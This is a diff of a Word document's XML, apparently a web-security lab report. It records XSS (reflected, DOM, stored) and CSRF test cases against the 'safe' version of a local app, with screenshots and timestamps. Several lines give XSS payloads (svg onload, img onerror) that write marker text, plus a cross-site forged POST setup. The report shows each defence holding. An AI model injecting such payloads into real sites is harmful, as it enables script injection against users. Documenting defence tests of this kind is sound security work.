-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Input or attack setup: &lt;svg onload="this.parentElement.innerHTML='&lt;strong&gt;STORED XSS EXECUTED&lt;/strong&gt;'"&gt;&lt;/svg&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Saved payload is visible as literal text to another visitor.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:44.780Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/safe/discussion</w:t>
+        <w:t>Safe Version XSS Reflected</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Input or attack setup: &lt;svg onload="document.getElementById(`se</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>arch-summary`).textContent=`REFLECTED XSS EXECUTED`"&gt;&lt;/svg&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Literal payload rendered without execution.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:11.123Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target endpoint: http://localhost:8000/safe/courses. Exact encoded URL is in verification.json.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5028,7 +5242,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="750EF221">
+        <w:pict w14:anchorId="56F95480">
           <v:shape id="_x0000_i1046" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId25" o:title=""/>
           </v:shape>
@@ -5057,7 +5271,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 26 of 41</w:t>
+        <w:t>Page 27 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5093,104 +5307,103 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Safe Csrf Before</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Input or attack setup: Normal authenticated profile update</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Original email persisted before the attack.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:45.318Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/safe/profile</w:t>
+        <w:t>Safe Version XSS DOM Based</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Input or attack setup: &lt;img src=x onerror="document.getElementById('note-preview').textContent='DOM XSS EXECUTED'"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Fragment rendered through textContent.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:12.028Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target endpoint: http://localhost:8000/safe/planner. Exact encoded URL is in verification.json.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5215,7 +5428,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="596BE448">
+        <w:pict w14:anchorId="362B9196">
           <v:shape id="_x0000_i1047" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId26" o:title=""/>
           </v:shape>
@@ -5244,7 +5457,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 27 of 41</w:t>
+        <w:t>Page 28 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5280,104 +5493,103 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Safe Csrf Response</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Input or attack setup: External auto-submitting POST: email=attacker@lab.invalid; no CSRF token</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Cross-site POST lacks the SameSite-protected session and redirects to login.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:46.088Z. The screenshot footer displays PKT.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Target URL: http://localhost:8000/safe/login</w:t>
+        <w:t>Safe Version XSS Stored</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Input or attack setup: &lt;svg onload="this.parentElement.innerHTML='&lt;strong&gt;STORED XSS EXECUTED&lt;/strong&gt;'"&gt;&lt;/svg&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Saved payload is visible as literal text to another visitor.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:13.873Z. The screenshot footer displays PKT.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Target URL: http://localhost:8000/safe/discussion</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5402,8 +5614,8 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="1B218795">
-          <v:shape id="_x0000_i1048" type="#_x0000_t75" style="width:495pt;height:344.25pt">
+        <w:pict w14:anchorId="407CEE3A">
+          <v:shape id="_x0000_i1048" type="#_x0000_t75" style="width:495pt;height:390pt">
             <v:imagedata r:id="rId27" o:title=""/>
           </v:shape>
         </w:pict>
@@ -5431,7 +5643,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Page 28 of 41</w:t>
+        <w:t>Page 29 of 46</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5467,80 +5679,79 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Safe Csrf After</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Input or attack setup: External POST followed by authenticated profile verification</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Observed result: Original email remains unchanged.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="0"/>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Capture timestamp UTC: 2026-10-09T13:06:46.722Z. The screenshot footer displays PKT.</w:t>
+        <w:t>Safe Version Csrf Before</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Input or attack setup: Normal authenticated profile update</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Observed result: Original email persisted before the attack.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="0"/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="180" w:line="280" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Capture timestamp UTC: 2026-10-11T16:08:14.546Z. The screenshot footer displays PKT.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5589,7 +5800,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="705B2868">
+        <w:pict w14:anchorId="13CBEC88">
           <v:shape id="_x0000_i1049" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId28" o:title=""/>
           </v:shape>
@@ -5618,7 +5829,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
